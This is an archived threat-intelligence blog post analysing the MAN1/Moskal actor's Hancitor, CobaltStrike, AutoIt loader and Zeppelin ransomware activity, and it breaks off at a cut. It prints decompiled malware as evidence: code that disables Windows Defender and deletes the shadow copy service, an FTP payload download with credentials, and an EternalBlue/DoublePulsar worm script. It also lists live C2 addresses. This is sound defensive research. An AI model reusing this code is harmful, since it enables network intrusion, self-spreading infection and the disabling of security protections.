{ "id": "57df1386-8591-474b-b42b-b5b95b586d68", "created_at": "2026-04-06T00:14:56.989855Z", "updated_at": "2026-04-10T13:12:41.786754Z", "deleted_at": null, "sha1_hash": "147179dfe5390b66c89e93060c3c28ea1fac658b", "title": "MAN1, Moskal, Hancitor and a side of Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1057080, "plain_text": "MAN1, Moskal, Hancitor and a side of Ransomware\r\nBy Jason Reaves\r\nPublished: 2021-01-10 · Archived: 2026-04-05 13:09:36 UTC\r\nPress enter or click to view image in full size\r\nMAN1 AKA Moskalvzapoe AKA TA511 are all names given to a threat actor(TA) that has been active in most\r\nmajor crimeware activities since at least 2014.\r\nWithin the last few years most of the major e-crime groups have shifted away from normal banking trojan\r\noperations and moved towards ransom and data theft, this transition has proven to be very beneficial for them —\r\neven though it is a drastic shift from the older days where locking activities were considered to be low-tier\r\nactivities and a waste of an infection.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 1 of 20\n\nRansomware payments from FBI, Photo Credit FBI Special Agent Joel DeCapua\r\nAs more groups began pivoting to enterprise-focused ransomware activities into 2020, it caused a trend where\r\ncompanies began funding these e-crime groups through ransom payments, turning them into criminal\r\norganizations with funding that rivals any major security startup. MAN1 is no exception as many researchers\r\nstarted to notice that Hancitor/Chanitor campaigns began leading to CobaltStrike.\r\nIn the linked sandbox report from the SANS article we can download and decode the chanitor/hancitor task listed:\r\nhttp://yudiartawan.com/a\r\nThe file can be decoded by using the first 8 bytes as a XOR key and then LZNT decompressing the result.\r\nAfter decoding the file we are left with a packed CobaltStrike stager, these stagers are built from CobaltStrike\r\nmuch like the beacon files as both will share the same watermark. After unpacking we can decode the shellcode\r\nthat will be responsible for downloading the beacon file:\r\n\\xfc\\xe8\\x89\\x00\\x00\\x00`\\x89\\xe51\\xd2d\\x8bR0\\x8bR\\x0c\\x8bR\\x14\\x8br(\\x0f\\xb7J\u00261\\xff1\\xc0\\xac\u003ca|\\x02\r\nThis stager shellcode will download and detonate the encoded beacon from:\r\n31.44.184.125/tYX7\r\nThe file is also available in the sandbox run and so we can decode the file which has a shellcode wrapper on top\r\nand then decode the CobaltStrike beacon configuration.\r\n{'PROXY_BEHAVIOR': '2', 'PROTOCOL': '0', 'SPAWNTO_X64': '%windir%\\\\sysnative\\\\rundll32.exe', 'SLEEPTI\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 2 of 20\n\nThe watermark from the beacon also matches the shellcode from the stager executable:\r\n'WATERMARK': '1873433027'\\xff31.44.184.125\\x00o\\xaaQ\\xc3\r\nWatermarks can be pivoted on by abusing the structure of the beacon configuration and known XOR keys, we\r\ntake the watermark value:\r\no\\xaaQ\\xc3\r\nXOR with 0x69:\r\n\\x06\\xc38\\xaa\r\nWe can find this value in the beacon:\r\n\u003e\u003e\u003e a = ‘\\x06\\xc38\\xaa’\r\n\u003e\u003e\u003e data = open(‘tYX7.decoded’, ‘rb’).read()\r\n\u003e\u003e\u003e data.find(a)\r\n202686\r\n\u003e\u003e\u003e data[202650:202700]\r\n‘ijiy9\u0026:=iiiiiiiiiiiiiuikimiiiiiLikim\\x06\\xc38\\xaaiOihikiiiN’\r\nThen do a VT content search based on part of the encoded data:\r\ncontent:\"{696b696d06c338aa}\"\r\nWhich leads to a bunch of files for pivoting to.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 3 of 20\n\nIf the CS package is shared or leaked however then it can lead you down all sorts of rabbit holes, you can use it\r\nfind lots of samples and then automate decoding all the config data and compare the beacon config and templating\r\nto try to find more related files.\r\nFor now I’m interested in a sample that talks to the IP and is packed with the same packer as the previous one:\r\nbd3c278309e4fe19f7b424ee0b56a1a2c0bbae3a59882d5b6f171d3ca89f728b\r\nUnpacking this file gives us similar shellcode:\r\n\\xfc\\xe8\\x89\\x00\\x00\\x00`\\x89\\xe51\\xd2d\\x8bR0\\x8bR\\x0c\\x8bR\\x14\\x8br(\\x0f\\xb7J\u00261\\xff1\\xc0\\xac\u003ca|\\x02\r\nSame watermark, IP address and URI as the previous one but this file has an interesting ITW(In the Wild) record\r\nin VirusTotal:\r\nhttp://en.bulgarienview.com/wp-content/themes/twentynineteen/inc/artvnch.exe\r\nThe filename for artvnch.exe as a CS stager can be seen as a tasking for an Amadey bot in VirusTotal,\r\nf3823f8c3d1f3d45e1a9268df5b89f9f60fa02f8ad267e7e6b7cbff74dcaf627.\r\nThis Amadey is associated with MAN1, Version 1.43 and C2s:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 4 of 20\n\ncompturot .com/f5lkB/index.php\r\nthaturicia .ru/f5lkB/index.php\r\ncholopethe .ru/f5lkB/index.php\r\nWe can actually find a lot of these files with the same names that are CS stagers being downloaded as tasks.\r\nbe4c49df859762dc2c7d11794f5731dd498698158b11a9ff18b3f91fdc1f591aCS stager downloaded from: hxxp://ph\r\nThe actor(s) appear to use multiple IP addresses along this range and a few others, for example:\r\n45.142.213.167\r\nWe can see a few things the artvnch.exe name again but also a work.exe file which is a CS stager download\r\nbeacon from:\r\n45.142.213.167/imP6\r\nThe watermark is also the same as our previously identified CS files. This server is hosting a number of other\r\ninteresting files:\r\nea93c89dbf63ec462f19f6ac039c0cdf3d283b64eaadd6c38679c9b70710bd71, doe_install.exe\r\n6e4459199d7fbdc4c215e595906e78fdd1c15ad3be6abed6540b80de17b63f3b,oxford.exe\r\nea93c89dbf63ec462f19f6ac039c0cdf3d283b64eaadd6c38679c9b70710bd71\r\nThe file doe_install.exe will, according to the cached sandbox report on VirusTotal, talk to another CS server:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 5 of 20\n\n185.153.196.207\r\nThis is an autoit compiled script that will eventually detonate two files but also perform some anti checks.\r\n$john = \"John\"\r\n$name1 = \"Peter Wilson\"\r\n$name2 = \"Acme\"\r\n$name3 = \"BOBSPC\"\r\n$name4 = \"Johnson\"\r\n$name5 = \"John\"\r\n$name6 = \"John Doe\"\r\n$name7 = \"Rivest\"\r\n$name8 = \"mw\"\r\n$name9 = \"me\"\r\n$name10 = \"sys\"\r\n$name11 = \"Apiary\"\r\n$name12 = \"STRAZNJICA.GRUBUTT\"\r\n$name13 = \"Phil\"\r\n$name14 = \"Customer\"\r\n$name15 = \"shimamu\"\r\n$pcname1 = \"RALPHS-PC\"\r\n$pcname2 = \"ABC-WIN7\"\r\n$pcname3 = \"man-PC\"\r\n$pcname4 = \"luser-PC\"\r\n$pcname5 = \"Klone-PC\"\r\n$pcname6 = \"tpt-PC\"\r\n$pcname7 = \"BOBSPC\"\r\n$pcname8 = \"WillCarter-PC\"\r\n$pcname9 = \"PETER-PC\"\r\n$pcname10 = \"David-PC\"\r\n$pcname11 = \"ART-PC\"\r\n$pcname12 = \"TOM-PC\"\r\nIf ProcessExists(\"frida-winjector-helper-32.exe\") OR ProcessExists(\"analyzer.exe\") Then\r\nExit\r\nEndIf\r\n$name = @UserName\r\n$pcname = @ComputerName\r\nIf @ComputerName = \"WIN7SP1-SSLCAP\" Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\secret.txt\") Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\my.txt\") Then\r\nExit\r\nEndIf\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 6 of 20\n\nIf FileExists(@DesktopDir \u0026 \"\\report.odt\") Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\report.rtf\") Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\Incidents.pptx\") Then\r\nExit\r\nEndIf\r\nIf $name = $name1 Then\r\nExit\r\nEndIf\r\nIf $name = $name2 Then\r\nExit\r\nEndIf\r\nIf $name = $name3 Then\r\nExit\r\nEndIf\r\nIf $name = $name4 Then\r\nExit\r\nEndIf\r\nIf $name = $name5 Then\r\nExit\r\nEndIf\r\nIf $name = $name6 Then\r\nExit\r\nEndIf\r\nIf $name = $name7 Then\r\nExit\r\nEndIf\r\nIf $name = $name8 Then\r\nExit\r\nEndIf\r\nIf $name = $name9 Then\r\nExit\r\nEndIf\r\nIf $name = $name10 Then\r\nExit\r\nEndIf\r\nIf $name = $name11 Then\r\nExit\r\nEndIf\r\nIf $name = $name12 Then\r\nExit\r\nEndIf\r\nIf $name = $name13 Then\r\nExit\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 7 of 20\n\nEndIf\r\nIf $name = $name14 Then\r\nExit\r\nEndIf\r\nIf $name = $name15 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname1 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname2 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname3 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname4 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname5 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname6 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname7 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname8 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname9 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname10 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname11 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname12 Then\r\nExit\r\nEndIf\r\nIf ProcessExists(\"joeboxcontrol.exe\") OR ProcessExists(\"joeboxserver.exe\") Then\r\nExit\r\nEndIf\r\nIf @OSVersion = \"WIN_XP\" Then\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 8 of 20\n\nExit\r\nEndIf\r\nIf FileExists(\"C:\\ProgramData\\Microsoft\\Check\\Check.txt\") Then\r\nExit\r\nAttempts to disable or uninstall security software:\r\nIf ProcessExists(\"msseces.exe\") Then\r\n$scmd = 'C:\\Windows\\System32\\wbem\\wmic.exe product where name=\"Microsoft Security Client\" cal\r\n$ipid = Run(@ComSpec \u0026 ' /C \"' \u0026 $scmd \u0026 '\"', \"\", @SW_HIDE)\r\nSleep(8000)DirCreate(\"C:\\Programdata\\install\")\r\nDirCreate(\"C:\\Programdata\\RunDLL\")\r\nDirCreate(\"C:\\Programdata\\Microsoft\\Intel\")\r\nDirCreate(\"C:\\Programdata\\System32\\logs\")\r\nDirCreate(\"C:\\ProgramData\\Microsoft\\Check\")\r\nDirCreate(\"C:\\ProgramData\\RealtekHD\")\r\nDirCreate(\"C:\\programdata\\WindowsTask\")\r\nDirCreate(\"C:\\programdata\\Microsoft\\temp\")\r\n$logfile = \"C:\\Programdata\\Microsoft\\Check\\Check.txt\"\r\nIf NOT FileExists($logfile) Then _filecreate($logfile)\r\n$pathscript = \"C:\\ProgramData\\RealtekHD\\taskhostw.exe\"\r\n$sname = (\"Realtek HD Audio\")\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\", $sname, \"REG_SZ\", $pathscript\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserLi\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\", \"DisableAntiSpyware\r\nRegWrite(\"HKLM\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\", \"DisableAntiSpyware\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableIO\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableBe\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableOn\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableRa\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"DisableBlockAltFirstS\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"DisableBlockAltFirstSee\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"LocalSettingOverrideS\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"LocalSettingOverrideSpy\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 9 of 20\n\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"SumbitSamplesConsent\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"SumbitSamplesConsent\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\", \"Exclusions_Paths\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\", \"Exclusions_Paths\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Programd\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Programdat\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Windows\\\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Windows\\Sy\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"EnableLUA\", \"RE\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"EnableLUA\", \"REG_\r\nSleep(100)\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"ConsentPromptBeha\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"ConsentPromptBe\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\", \"UseActionCenterE\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\", \"UseActionCenterExp\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\", \"En\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\", \"disable\",\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\", \"To\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\", \"DisableEnhancedNot\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\", \"Notificatio\r\nSleep(100)\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\", \"Di\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nDelete shadow file service:\r\nRun(@ComSpec \u0026 \" /c \" \u0026 \"sc delete swprv\", \"\", @SW_HIDE)\r\nThe script will also perform a request at the end which is probably for stats tracking:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 10 of 20\n\n$iplog2 = \"https://iplogger.org/1fCk97\"\r\nInetRead($iplog2, 3)\r\nUltimately as mentioned before the script will detonate two files:\r\nIf @OSArch = \"X64\" Then\r\nFileInstall(\"C:\\2\\taskhostw.exe\", \"C:\\ProgramData\\RealtekHD\\taskhostw.exe\")\r\nSleep(1000)\r\nRun(\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\")\r\nFileInstall(\"C:\\2\\art.exe\", \"C:\\ProgramData\\install\\art.exe\")\r\nRun(\"C:\\ProgramData\\install\\art.exe\")\r\nart.exe — d08131d236658401c8de489596ee83992058f05176cbd8b72add89fcea57e37c\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThis is a packed CS stager that will download a beacon from:\r\n185.153.196. 207/M7ph\r\nAlso with the same watermark as our previously identified CS related files. The other file is a bit different.\r\ntaskhostw.exe — 3ac1741ee7dcf04cb5dba01d82d4232347a63697f0ca8b00661960f719cade23\r\nThis is a 64bit Autoit compiled executable, decompiled shows the file is simply a loader, it has the same anti\r\nchecks as previously discussed but also creates a window with the title “YouWillBeMined2” which will be used as\r\na check to see if it is already running.\r\nGUICreate(\"YouWillBeMined2\")\r\nThe script will then download a file from an FTP server:\r\n$worked = \"ONLINE\"\r\n$server = \"learinmica.com\"\r\n$username = \"alex\"\r\n$pass = \"easypassword\"\r\nLocal $open = _ftp_open(\"FTP\")\r\nJudging by the checks that then happen you can speculate that this will be involved in SMB scanning for\r\nspreading:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 11 of 20\n\nIf $worked = \"ONLINE\" Then\r\nIf $ftp_status = \"ONLINE\" Then\r\nIf @OSVersion \u003c\u003e \"WIN_10\" Then\r\nIf NOT FileExists(\"C:\\Programdata\\RunDLL\\Doublepulsar-1.3.1.exe\") OR NOT File\r\nConsoleWrite(\"Downlading Scaner.dat\" \u0026 @CRLF)\r\nLocal $ftp_xmrigcpu64 = \"scaner.dat\"\r\nLocal $hopen = _ftp_open(\"FTP\")\r\nLocal $hconn = _ftp_connect($hopen, $server, $username, $pass, 1)\r\nLocal $ftpg = _ftp_fileget($hconn, $ftp_xmrigcpu64, \"C:\\Programdata\\W\r\nLocal $isize = _ftp_filegetsize($hconn, \"/\" \u0026 $ftp_xmrigcpu64)\r\nConsoleWrite($isize \u0026 @CRLF)\r\nLocal $iftpc = _ftp_close($hconn)\r\nLocal $iftpo = _ftp_close($hopen)\r\nFileSetAttrib(\"C:\\ProgramData\\WindowsTask\\scaner.dat\", \"+SH\")\r\nSleep(300)\r\nFileMove(\"C:\\Programdata\\Windowstask\\scaner.dat\", \"C:\\Programdata\\Win\r\nFileSetAttrib(\"C:\\ProgramData\\WindowsTask\\scaner.exe\", \"+SH\")\r\nSleep(300)\r\nRun(\"C:\\Programdata\\WindowsTask\\scaner.exe -pnaxui\")\r\nSleep(2000)\r\nFileDelete(\"C:\\Programdata\\WindowsTask\\scaner.dat\")\r\nFileDelete(\"C:\\Programdata\\WindowsTask\\scaner.exe\")\r\nFileSetAttrib(\"C:\\ProgramData\\RunDLL\\*.*\", \"+SH\")\r\nFileSetAttrib(\"C:\\ProgramData\\RunDLL\", \"+SH\")\r\nEndIf\r\nSleep(2000)\r\nIf NOT ProcessExists(\"system.exe\") Then\r\nIf NOT ProcessExists(\"Msiexec64.exe\") Then\r\nIf FileExists(\"C:\\ProgramData\\RunDLL\\start.exe\") Then\r\nRun(\"C:\\ProgramData\\RunDLL\\start.exe\")\r\nConsoleWrite(\"Staring Scaner RunDLL.exe\" \u0026 @CRLF)\r\nEndIf\r\nEndIf\r\nEndIf\r\nEndIf\r\nFTP server is on same range as some of the CS boxes:\r\nlearinmica .com. 600 IN A 31.44.184 .108\r\nscaner.dat — 3f51abd78e607bcd707cbd2f4d90a3d02d5d00fa07320a88838c373239ee6d4b\r\nThis file is a password protected self extracting rar, the password is naxui from the detonation above in the script.\r\nAfter unpacking the files we are left with a bunch of files related to EternalBlue and DoublePulsar but the script\r\nabove is mainly related to detonating start.exe\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 12 of 20\n\nstart.exe — 54081e33bcd09d29d065533c230256e49adff2edd48f5eb91a2434c03dd9ecb9\r\nThis file is a SFX RAR with a vbs inside of it, the VBS file just detonates another file that was unpacked:\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run \"cmd.exe /c Rundll.exe\", 0, false\r\nrundll.exe — 8b58e3a1a6a11225050af6c82e92451779c0315a602d19ad330e175a7c416bf6\r\nThis is a compiled python script which we can decompile:\r\nimport subprocess\r\nimport time\r\nimport threading\r\nimport socket\r\nimport sys\r\nimport random\r\nimport os\r\ntry:\r\n MyIP = socket.gethostbyname_ex(socket.gethostname())[2]\r\nexcept:\r\n MyIP = '10.0.0.2'\r\ndef EternalBlue(ip):\r\n path = 'Eternalblue-2.2.0.exe'\r\n inconfig = ' --inconfig Eternalblue-2.2.0.xml'\r\n NetworkTimeout = ' --NetworkTimeout 60'\r\n TargetIp = ' --TargetIp %s' % ip\r\n TargetPort = ' --TargetPort 445'\r\n Target = ' --Target WIN72K8R2'\r\n summ = path + inconfig + NetworkTimeout + TargetIp + TargetPort + Target\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(summ, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n output = list(output)\r\n output = output[0].split('\\r\\n')\r\n if output.count('[+] CORE terminated with status code 0x00000000') == 1 and output.count(' [+\r\n x = 'good x64'\r\n return x\r\n elif output.count('[+] CORE terminated with status code 0x00000000') == 1 and output.count('\r\n x = 'good x86'\r\n return x\r\n else:\r\n x = 'not good'\r\n return x\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 13 of 20\n\ndef Pulsar(ip, arch, dll):\r\n path = 'Doublepulsar-1.3.1.exe'\r\n inconfig = ' --inconfig Doublepulsar-1.3.1.xml'\r\n NetworkTimeout = ' --NetworkTimeout 60'\r\n TargetIp = ' --TargetIp %s' % ip\r\n TargetPort = ' --TargetPort 445'\r\n DllPayload = ' --DllPayload %s' % dll\r\n DllOrdinal = ' --DllOrdinal 1'\r\n ProcessName = ' --ProcessName lsass.exe'\r\n Protocol = ' --Protocol SMB'\r\n Architecture = ' --Architecture %s' % arch\r\n Function = ' --Fuction RunDll'\r\n processCommandLine = ' --processCommandLine'\r\n summ = path + inconfig + NetworkTimeout + TargetIp + TargetPort + Architecture + DllPayload + Pro\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(summ, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n list(output)\r\n output = output[0].split('\\r\\n')\r\ndef scaner(ip):\r\n try:\r\n os.remove('Result.txt')\r\n except:\r\n pass\r\n Result = []\r\n scan = 'system.exe TCP %s 445 150 /save' % ip\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(scan, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n for line in open('Result.txt', 'r').read().split('\\n'):\r\n if line.find('Open') \u003e 1:\r\n Result.append(line.split(' ')[0])\r\n print Result\r\n os.remove('Result.txt')\r\n return Result\r\ndef scaner_local(ip):\r\n try:\r\n os.remove('Result.txt')\r\n except:\r\n pass\r\n Result = []\r\n scan = 'system.exe TCP %s 445 150 /save' % ip\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(scan, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 14 of 20\n\noutput = p.communicate()\r\n for line in open('Result.txt', 'r').read().split('\\n'):\r\n if line.find('Open') \u003e 1:\r\n Result.append(line.split(' ')[0])\r\n for x in MyIP:\r\n if x in Result:\r\n Result.remove(x)\r\n os.remove('Result.txt')\r\n return Result\r\ndef attack(lst):\r\n status = EternalBlue(lst)\r\n if status == 'good x64':\r\n Pulsar(lst, 'x64', 'x64.dll')\r\n print 'Attack %s good' % lst\r\n elif status == 'good x86':\r\n Pulsar(lst, 'x86', 'x86.dll')\r\n print 'Attack %s good' % lst\r\n else:\r\n print 'Attack %s not good!!!' % lst\r\ndef attack2(lst):\r\n status = EternalBlue(lst)\r\n if status == 'good x64':\r\n Pulsar(lst, 'x64', '2x64.dll')\r\n print 'Attack %s good' % lst\r\n elif status == 'good x86':\r\n Pulsar(lst, 'x86', '2x86.dll')\r\n print 'Attack %s good' % lst\r\n else:\r\n print 'Attack %s not good!!!' % lst\r\ndef new_start():\r\n print 'STARTED'\r\n scanlist = []\r\n lst = []\r\n for line in open('scan.txt', 'r').read().split('\\n'):\r\n for unit in line.split(' '):\r\n scanlist.append(unit)\r\n randomip = random.choice(scanlist)\r\n lst = scaner(randomip)\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack2, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 15 of 20\n\nprint 'FINISHED'\r\ndef start_local():\r\n print 'STARTED_local'\r\n lst = []\r\n for ip in MyIP:\r\n lst = scaner_local(ip + '/16')\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\n print 'FINISHED'\r\ndef new_random():\r\n print 'STARTED'\r\n randomip = str(random.randint(1, 254)) + '.' + str(random.randint(0, 254)) + '.' + '0.' + '0'\r\n print 'scan ' + randomip + '/16'\r\n lst = scaner(randomip + '/16')\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\n print 'FINISHED'\r\nwhile True:\r\n new_start()\r\n start_local()\r\nUltimately this script is using DoublePulsar and EternalBlue to spread the x86.dll,x64.dll,2x86.dll,2x64.dll files\r\nwhich turn out to be fairly simplistic downloaders:\r\nUser-Agent RookIE/1.0\r\nhxxp://learinmica.com/update/update[.]rar\r\nThe file will be stored in the ProgramData directory and leads to similar Autoit executables for using scaner.dat\r\nand CS stagers leading to more CS servers:\r\ntaskhosta.exe - e2f686f17b73398d949998e46c7fde48d0507b324a811df39cdd91531deb3d89\r\nThis is a CS stager using a different watermark and downloading a beacon from:\r\n31.44.184 .50/nECf\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 16 of 20\n\nThe other file we previously mentioned from 45.142.213[.]167:\r\noxford.exe - 6e4459199d7fbdc4c215e595906e78fdd1c15ad3be6abed6540b80de17b63f3b\r\nThis is VegaLocker ransomware version Zeppelin, we can quickly decode all the onboard strings:\r\n\u003e\u003e\u003e import re\r\n\u003e\u003e\u003e t = re.findall('''\\xff\\xff\\xff\\xff.\\x00\\x00\\x00''', data)\r\n\u003e\u003e\u003e 